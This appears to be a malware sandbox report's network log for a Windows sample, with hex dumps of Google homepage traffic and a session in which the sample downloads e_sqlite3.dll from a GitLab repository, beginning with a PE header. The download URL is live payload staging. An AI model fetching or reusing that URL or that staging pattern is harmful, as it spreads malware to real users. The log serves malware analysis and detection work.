                                                                                                                                                                                                                Data Ascii: t-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61
                                                                                                                                                                                                                Data Ascii: lative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/ima
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 6f 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32
                                                                                                                                                                                                                Data Ascii: 10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 20 30 3b 77 68 69 74 65 2d
                                                                                                                                                                                                                Data Ascii: pms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10px 20px 0;white-


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                20192.168.2.649730142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1199INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:05 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-4FLq4mKClGOpNu7OgieJnQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Set-Cookie: AEC=AZ6Zc-Wjt9FgUHfX9QPOKv4JIZwMqzp7Zu8kmlhGVD5A0LW9jNca0qaphg; expires=Sun, 13-Jul-2025 11:48:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                Set-Cookie: NID=520=ZSfzJF5qgpfk1ohRV_Zan9V2PbSWA-iH09BmI-Ux2wRI0oF48EyPQwztgQFwv0ODhsCv8ykuot8eVEXHLYrxZf47w_KkErbw7916w5CBWtEJo7YP4gOUGHhy3wsdxGCeA7QpNqmEtH_A3rEnDxWcMEyD7RU-buVEnuUVAsGZOa-hKGnJzzcLSzxQTI9A4MylgFPTh5pDK73tbw1aMTI; expires=Wed, 16-Jul-2025 11:48:05 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC191INData Raw: 35 32 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65
                                                                                                                                                                                                                Data Ascii: 521b<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74
                                                                                                                                                                                                                Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_st
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 2c 31 2c 33 2c 31 36 33 34 2c 35 37 36 2c 31 35 31 2c 35 2c 33 35 37 2c 36 38 31 2c 31 2c 33 38 34 2c 32 2c 32 38 37 2c 31 2c 36 2c 33 31 38 2c 35 33 31 2c 32 35 33 2c 31 34 32 2c 36 30 32 2c 36 33 2c 34 30 35 2c 34 31 37 2c 32 37 35 2c 35 38 2c 37 37 34 2c 32 35 37 2c 39 38 39 2c 32 2c 31 36 36 32 2c 31 39 34 2c 34 36 38 2c 31 39 33 2c 38 35 39 2c 31 37 2c 33 2c 33 32 30 2c 34 36 31 2c 38 32 35 2c 31 2c 31 38 34 32 2c 36 37 37 2c 31 36 38 2c 33 2c 34 31 30 2c 36 39 32 2c 39 31 36 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 33 2c 37 32 37 2c 36 34 37 2c 32 2c 33 2c 37 2c 32 31 30 2c 34 39 39 2c 32 39 39 2c 33 34 31 2c 31 33 2c 31 2c 31 2c 38 30 2c 38 34 30 2c 31 30 34 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 34 31 2c 33 35 39 2c 31 31 34 37 2c 35 30 33 2c 31 37
                                                                                                                                                                                                                Data Ascii: ,1,3,1634,576,151,5,357,681,1,384,2,287,1,6,318,531,253,142,602,63,405,417,275,58,774,257,989,2,1662,194,468,193,859,17,3,320,461,825,1,1842,677,168,3,410,692,916,1,5,4,4,4,163,727,647,2,3,7,210,499,299,341,13,1,1,80,840,104,2,1,2,2,2,3,41,359,1147,503,17
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d
                                                                                                                                                                                                                Data Ascii: ===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={};google.sy=[]
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 39 39 38 3b 72 69 67 68 74
                                                                                                                                                                                                                Data Ascii: l,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z-index:998;right
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74 3a 35 70 78 5c 30 2f 3b 62 6f 74 74 6f 6d 3a 34 70 78 5c 30 2f 7d 2e 67 62 6d 61 7b 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                                                                                                Data Ascii: rogid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px\0/}.gbma{position:
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61
                                                                                                                                                                                                                Data Ascii: btsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5a
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e
                                                                                                                                                                                                                Data Ascii: bmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 6f 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c
                                                                                                                                                                                                                Data Ascii: mc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2px 4px rgba(0,0,
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1390INData Raw: 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 20 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62
                                                                                                                                                                                                                Data Ascii: :nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10px 20px 0;white-space:nowrap}.gb


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                21192.168.2.649864172.65.251.784434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC127OUTGET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1
                                                                                                                                                                                                                Host: gitlab.com
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:28 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 1780736
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                CF-Ray: 901d65aeaeb47ced-EWR
                                                                                                                                                                                                                CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Cache-Control: max-age=3600, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                Content-Disposition: attachment; filename="e_sqlite3.dll"; filename*=UTF-8''e_sqlite3.dll
                                                                                                                                                                                                                ETag: "fc529fb92be2696af6fda5021785be60"
                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC502INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 50 37 68 34 7a 38 55 59 51 73 34 39 4d 44 6f 77 49 75 6e 6c 6b 31 41 62 61 6b 63 61 6a 52 31 70 5a 73 31 36 52 32 6f 6e 57 64 47 61 68 35 75 45 7a 4e 70 39 64 77 63 61 68 6d 50 79 25 32 46 61 72 79 25 32 46 6e 55 50 6d 4d 33 4b 51 7a 43 32 6d 5a 67 58 51 42 73 51 25 32 46 70 55 57 25 32 46 74 71 72 49 5a 78 64 48 38 45 36 50 6a 48 72 57 34 34 47 78 54 30 6a 4a 64 75 67 33 48 41 55 4f 30 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
                                                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P7h4z8UYQs49MDowIunlk1AbakcajR1pZs16R2onWdGah5uEzNp9dwcahmPy%2Fary%2FnUPmM3KQzC2mZgXQBsQ%2FpUW%2FtqrIZxdH8E6PjHrW44GxT0jJdug3HAUO04%3D"}],"group":"cf-nel","max_age":604800}NEL
                                                                                                                                                                                                                2025-01-14 11:48:28 UTC959INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e b6 df 42 0a d7 b1 11 0a d7 b1 11 0a d7 b1 11 41 af b2 10 1e d7 b1 11 41 af b4 10 99 d7 b1 11 41 af b5 10 2b d7 b1 11 41 af b0 10 09 d7 b1 11 0a d7 b0 11 83 d7 b1 11 58 a2 b4 10 2a d7 b1 11 58 a2 b5 10 04 d7 b1 11 58 a2 b2 10 00 d7 b1 11 c7 a2 b5 10 08 d7 b1 11 c7 a2 b1 10 0b d7 b1 11 c7 a2 4e 11 0b d7 b1 11 c7 a2 b3 10 0b d7 b1 11 52 69 63 68 0a d7 b1 11 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NBAAA+AX*XXNRich
